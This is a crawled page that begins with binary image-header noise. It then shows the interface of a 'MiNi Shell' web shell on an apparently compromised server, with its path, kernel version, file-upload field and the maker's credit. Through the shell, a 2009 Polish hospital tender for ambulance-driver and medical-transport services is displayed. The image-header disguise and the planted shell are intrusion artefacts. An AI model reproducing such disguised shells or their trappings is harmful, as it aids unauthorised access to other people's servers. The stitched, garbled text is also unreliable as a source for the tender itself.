JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090306/52388-N-2009.html

<p class="kh_header"><b>Poznań: Usługa polegająca na zapewnieniu obsługi kierowców karetek neonatologicznych oraz zabezpieczeniu transportu sanitarnego i dostawczego na potrzeby Ginekologiczno-Położniczego Szpitala Klinicznego Uniwersytetu Medycznego im. K. Marcinkowskiego w Poznaniu</b><br>
<b>Numer ogłoszenia: 52388 - 2009; data zamieszczenia: 06.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ginekologiczno-Położniczy Szpital Kliniczny Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu , ul. Polna 33, 60-535 Poznań, woj. wielkopolskie, tel. 061 8419294, faks 061 8419620.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa polegająca na zapewnieniu obsługi kierowców karetek neonatologicznych oraz zabezpieczeniu transportu sanitarnego i dostawczego na potrzeby Ginekologiczno-Położniczego Szpitala Klinicznego Uniwersytetu Medycznego im. K. Marcinkowskiego w Poznaniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa  polegająca  na  zapewnieniu  obsługi  kierowców  karetek  neonatologicznych  oraz  na  zabezpieczeniu  transportu  sanitarnego  i  dostawczego  na  potrzeby  Ginekologiczno-Położniczego Szpitala  Klinicznego  Uniwersytetu  Medycznego  im. Karola  Marcinkowskiego  w  Poznaniu.
Zakres  usługi ;  
a)	zapewnienie  obsługi  kierowców  karetek  neonatologicznych każdego dnia w okresie obowiązywania umowy przez 24 godziny,
b)	zabezpieczenie  transportu  sanitarnego od poniedziałku do piątku  w  godz. od 07:00 do 15:00,
c)	zabezpieczenie  transportu  dostawczego od poniedziałku do piątku  w  godz. od 07:00 do 15:00.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.00.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O   udzielenie  zamówienia  mogą  ubiegać się Wykonawcy,  którzy;

1) posiadają  uprawnienia  do  wykonywania  określonej  działalności  lub  czynności,  jeżeli  ustawy  nakładają  obowiązek  posiadania  takich  uprawnień;
2)  posiadają  niezbędną  wiedzę  i  doświadczenie  oraz  dysponują  potencjałem  technicznym  i  osobami  zdolnymi  do  wykonania  zamówienia  lub  przedstawią  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego  i  osób  zdolnych  do  wykonania  zamówienia;
3)  znajdują  się  w  sytuacji  ekonomicznej  i  finansowej  zapewniającej  wykonanie  zamówienia;
4)  nie  podlegają  wykluczeniu  z  postępowania  o  udzielenie  zamówienia.

Szczegółowe  warunki  udziału  w  postępowaniu  ustalone  przez  Zamawiającego:
1.  w  zakresie  warunku  wskazanego  w   punkcie  2)  Zamawiający   wymaga:
-  wykazania  się  wykonaniem co najmniej jednej  usługi odpowiadającej  przedmiotowi  zamówienia   tj.  usługi  transportu  sanitarnego  R  lub  N  i   wartości  nie  mniejszej  niż 200 000  zł  brutto.  
-  zapewnienia  obsługi  pojazdów  przez  kierowców  spełniających  wymagania  określone  w   art.  95 a  ust. 1,  art.  122  i  art.  124  ustawy  -  Prawo  o  ruchu  drogowym  ( Dz. U.  z  2005 r.  Nr 108,  poz. 908  z  późn. zm.)  tj. posiadających  aktualne  zaświadczenia  lekarza  medycyny  pracy  o  zdolności  do  wykonywania  pracy  na  stanowisku  kierowcy  karetki  neonatologicznej,  kierowcy  transportu  sanitarnego  oraz  kierowcy  transportu  dostawczego,
-  realizacji  usługi  transportu  sanitarnego  środkiem  transportu  przystosowanym  jako  pojazd  uprzywilejowany,  posiadającym  ważne  pozwolenie  na  używanie  sygnałów świetlnych  
i  dźwiękowych  wydane  przez  MSWiA,
-  realizacji  usługi  transportu sanitarnego  środkiem  transportu  odpowiadającym  warunkom  technicznym  określonym  w  Rozporządzeniu  Ministra  Infrastruktury  z  dnia  21.12.2002 r.  ( Dz. U.  z  2003 r.  Nr  32,  poz. 262  z  późn.  zm. )  w  sprawie  warunków  technicznych  pojazdów  oraz  zakresu  ich  niezbędnego  wyposażenia,
-  dysponowania  jednym  samochodem  na  zabezpieczenie transportu sanitarnego i jednym  samochodem  na  zabezpieczenie  transportu  dostawczego.
2.  w  zakresie  warunku  wskazanego  w   punkcie  3)  Zamawiający   wymaga  ubezpieczenia  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  na  kwotę  nie  mniejszą  niż  100 000 zł.  

Ocena  spełniania  warunków dokonana  będzie  na  podstawie  dokumentów  i  oświadczeń  żądanych  w  pkt. 8  niniejszej  specyfikacji  i  przedstawionych  wraz   z  ofertą,  z  zastosowaniem  metody   spełnia / nie spełnia .  
Wykonawca  nie  spełniający  któregokolwiek  z  warunku  zostaje  wykluczony  z  postępowania,  a  złożona  przez  niego  oferta  nie  będzie  rozpatrywana,  ponieważ  na  podstawie  art.  24  ust. 4  ustawy  uznaje  się  ją  za  odrzuconą.
Decyzję dotyczącą wykluczenia Wykonawcy  z  postępowania  Zamawiający  podejmuje  z uwzględnieniem  obowiązków,  o  których  mowa  w  art.  26  ust. 3  ustawy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  W  celu  potwierdzenia,  że  Wykonawca  posiada  uprawnienie  do  wykonywania  określonej  działalności  lub  czynności  oraz  nie  podlega  wykluczeniu  na  podstawie  art.  24  ustawy,  wraz  z  ofertą  należy  przedstawić;
1)	aktualny  odpis  z  właściwego  rejestru  lub  aktualne  zaświadczenie  o  wpisie  do  ewidencji  działalności  gospodarczej,  jeżeli  odrębne  przepisy  wymagają  wpisu  do  rejestru  lub  zgłoszenia  do  ewidencji  działalności  gospodarczej,  wystawiony  nie  wcześniej  niż  6  miesięcy  przed  upływem  terminu  składania  ofert,
2)	aktualne  zaświadczenie  właściwego  naczelnika  urzędu  skarbowego  oraz  właściwego  oddziału  Zakładu  Ubezpieczeń  Społecznych  lub  Kasy  Rolniczego  Ubezpieczenia  Społecznego potwierdzające  odpowiednio,  że  Wykonawca  nie  zalega  z  opłacaniem  podatków,  opłat  oraz  składek  na  ubezpieczenie  zdrowotne  i  społeczne  lub  zaświadczeń,  że  uzyskał  przewidziane  prawem  zwolnienie,  odroczenie  lub  rozłożenie  na  raty  zaległych  płatności  lub  wstrzymanie  w  całości  wykonania  decyzji  właściwego  organu  -  wystawione  nie  wcześniej  niż  3  miesiące  przed  upływem  terminu  składania  ofert,

2.  W  celu  potwierdzenia  opisanego  przez  Zamawiającego  warunku  posiadania  przez   Wykonawcę niezbędnej  wiedzy  i  doświadczenia  oraz  dysponowania  potencjałem  technicznym  i  osobami  zdolnymi  do  wykonania  zamówienia,  do  oferty  należy  dołączyć;
1)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych - wg wzoru załącznika nr  8  do specyfikacji - , usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie. Zamawiający wymaga przedstawienia w/w wykazie wykonanej co najmniej jednej usługi odpowiadającej przedmiotowi zamówienia,  polegającej na świadczeniu usługi transportu sanitarnego R lub N o wartości nie  mniejszej niż 200 000 zł brutto. Dokumentami potwierdzającymi należyte wykonanie usługi mogą być 
np. referencje, rekomendacje, listy polecające, opinie itp. Z treści w/w dokumentów winno jednoznacznie wynikać, iż dotyczą one przedstawionych w wykazie usług.
2)  wykaz  osób,  -  wg  wzoru  załącznika  nr  9  do  specyfikacji -  którymi  dysponuje  lub  będzie  dysponował  Wykonawca i które będą  uczestniczyć  w  wykonywaniu  zamówienia,  wraz  z  informacjami  na  temat  ich  kwalifikacji  zawodowych,  doświadczenia  i  wykształcenia  niezbędnych  do  wykonania  zamówienia,  a  także  zakresu  wykonywanych  przez  nie  czynności.
Pisemne  zobowiązanie  innych  podmiotów do udostępnienia osób zdolnych do wykonania  zamówienia,  jeżeli  w  wykazie  wykonawca  wskazał  osoby,  którymi  będzie  dysponował. 
3) wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń - wg wzoru załącznika   nr   10  do specyfikacji -, którymi  dysponuje  lub  będzie  dysponował  Wykonawca.  Zamawiający  wymaga  jednego  samochodu  na  zabezpieczenie transportu sanitarnego  i  jednego  na  zabezpieczenie transportu dostawczego.
3.   W  celu  potwierdzenia  opisanego  przez  Zamawiającego  warunku  znajdowania  się  przez  Wykonawcę  w  sytuacji  ekonomicznej  i  finansowej  zapewniającej  wykonanie  zamówienia, do  oferty  należy  dołączyć  następujące  dokumenty;
1)	polisę   lub  inny  dokument  ubezpieczenia  potwierdzający,  że  Wykonawca  jest  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności.  Wraz  z ofertą  Wykonawca składa oświadczenie,  iż w przypadku uzyskania zamówienia, najpóźniej w dniu podpisania umowy  przedstawi polisę,  a  w  przypadku  jej  braku  inny  dokument  potwierdzający,  że  Wykonawca  jest  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  na  kwotę  nie  mniejszą  niż  100 000  zł.
4.  Oświadczenie  o  spełnieniu  warunków  wskazanych  w  art.  22  ust. 1  ustawy  z  dnia  29  stycznia  2004 r. - Prawo  zamówień  publicznych;  załącznik   nr  6  do  specyfikacji.
5. Oświadczenie,  że  Wykonawca  nie  podlega  wykluczeniu  z  postępowania  na  podstawie  art.  24  ustawy ;  załącznik  nr  7  do  specyfikacji.

6.  Wykonawcy   mający   siedzibę  lub  miejsce   zamieszkania   poza    terytorium  Rzeczypospolitej   Polskiej  stosują  się  do  przepisów  §  2  Rozporządzenia  Prezesa  Rady  Ministrów  z  dnia  19  maja  2006 r. 
( Dz. U.  Nr  87,  poz.  605 ) w  sprawie  rodzajów  dokumentów,  jakich  może  żądać  Zamawiający  od  Wykonawcy,  oraz  form,  w  jakich  te  dokumenty  mogą  być  składane oraz  Rozporządzenia  Prezesa  Rady  Ministrów  z  dnia  16  października  2008 r.  (  Dz. U.  Nr  188,  poz. 1155)  zmieniającego  rozporządzenie  w  sprawie  rodzajów  dokumentów,  jakich  może  żądać  Zamawiający  od  Wykonawcy,  oraz  form,  w  jakich  te  dokumenty  mogą  być  składane.  

7. Zamawiający  dopuszcza  możliwość  złożenia  oferty  przez  dwóch  lub  więcej  Wykonawców  (  w  ramach  oferty  wspólnej )  w  rozumieniu  art.  23  ustawy,  pod  warunkiem,  że  taka  oferta   spełniać  będzie  następujące  wymagania;
1) Wykonawcy  są  zobowiązani  ustanowić  Wykonawcę  -  Pełnomocnika  do  reprezentowania  ich  w  postępowaniu  o  udzielenie  zamówienia  albo  do  reprezentowania  ich  w  postępowaniu  i  zawarcia  umowy  stosownie  do  art.  23,  ust. 2  ustawy  -  Prawo  zamówień  publicznych.
2)	Dokument  pełnomocnictwa  musi  być  załączony  do  oferty  i  zawierać  w  szczególności  wskazanie:  postępowania  o  zamówienie  publiczne,  którego  dotyczy,  Wykonawców  ubiegających  się  wspólnie  o  udzielenie  zamówienia,  ustanowionego  Wykonawcę  -  Pełnomocnika  oraz  zakres  jego  umocowania.




3)	Dokument  pełnomocnictwa  musi  być  podpisany  w  imieniu  wszystkich  Wykonawców  ubiegających  się  wspólnie  o  udzielenie  zamówienia,  w  tym  Wykonawcę  ustanowionego  jako  Pełnomocnika  i  przez  osoby  uprawnione  do  składania  oświadczeń  woli  wymienione  we  właściwym  rejestrze  lub  ewidencji  Wykonawcy.
4)  Dokumenty  wymienione  w  punkcie  1,  4  i  5  każdy  Wykonawca  składa  oddzielne. Pozostałe  dokumenty  mogą  dotyczyć  zarówno  jednego,  większej  liczby,  jak  i  wszystkich  Wykonawców.
5)  Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  ponoszą  solidarną  odpowiedzialność  za  wykonanie  umowy.

8.   Na   podstawie   przepisu   art.  36,  ust.  4  ustawy   Zamawiający  żąda  wskazania   przez      Wykonawcę  w ofercie  części  zamówienia,  której  wykonanie  powierzy  podwykonawcom.  

Wymagane  dokumenty  mogą  mieć  formę  oryginałów  lub  kopii  poświadczonej  za  zgodność  z  oryginałem  przez  Wykonawcę.  
Zamawiający  zażąda  przedstawienia  oryginału  lub  notarialnie  poświadczonej  kopii  dokumentu,  gdy  złożona  kopia  dokumentu  będzie  nieczytelna  lub  wzbudzi  wątpliwość  co  do  jej  prawdziwości.
Dokumenty  sporządzone  w  języku  obcym  są  składane  wraz  z  tłumaczeniem  na  język  polski  poświadczonym  przez  Wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.gpsk.am.poznan.pl/dzp.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ginekologiczno-Położniczy Szpitak Kliniczny Uniwersytetu Medycznego im. K. Marcinkowskiego,  ul. Polna  33  60-535  Poznań  
Dział  Zamówień  Publicznych, Budynek Techn. wejście E 1,  pokój  nr  104.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2009 godzina 09:00, miejsce: Ginekologiczno-Położniczy Szpitak Kliniczny Uniwersytetu Medycznego im. K. Marcinkowskiego,  ul. Polna  33  60-535  Poznań  
Kancelaria  Ogółna, Budynek Wielofunkcyjny wejście D 1,  pokój  nr  317.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com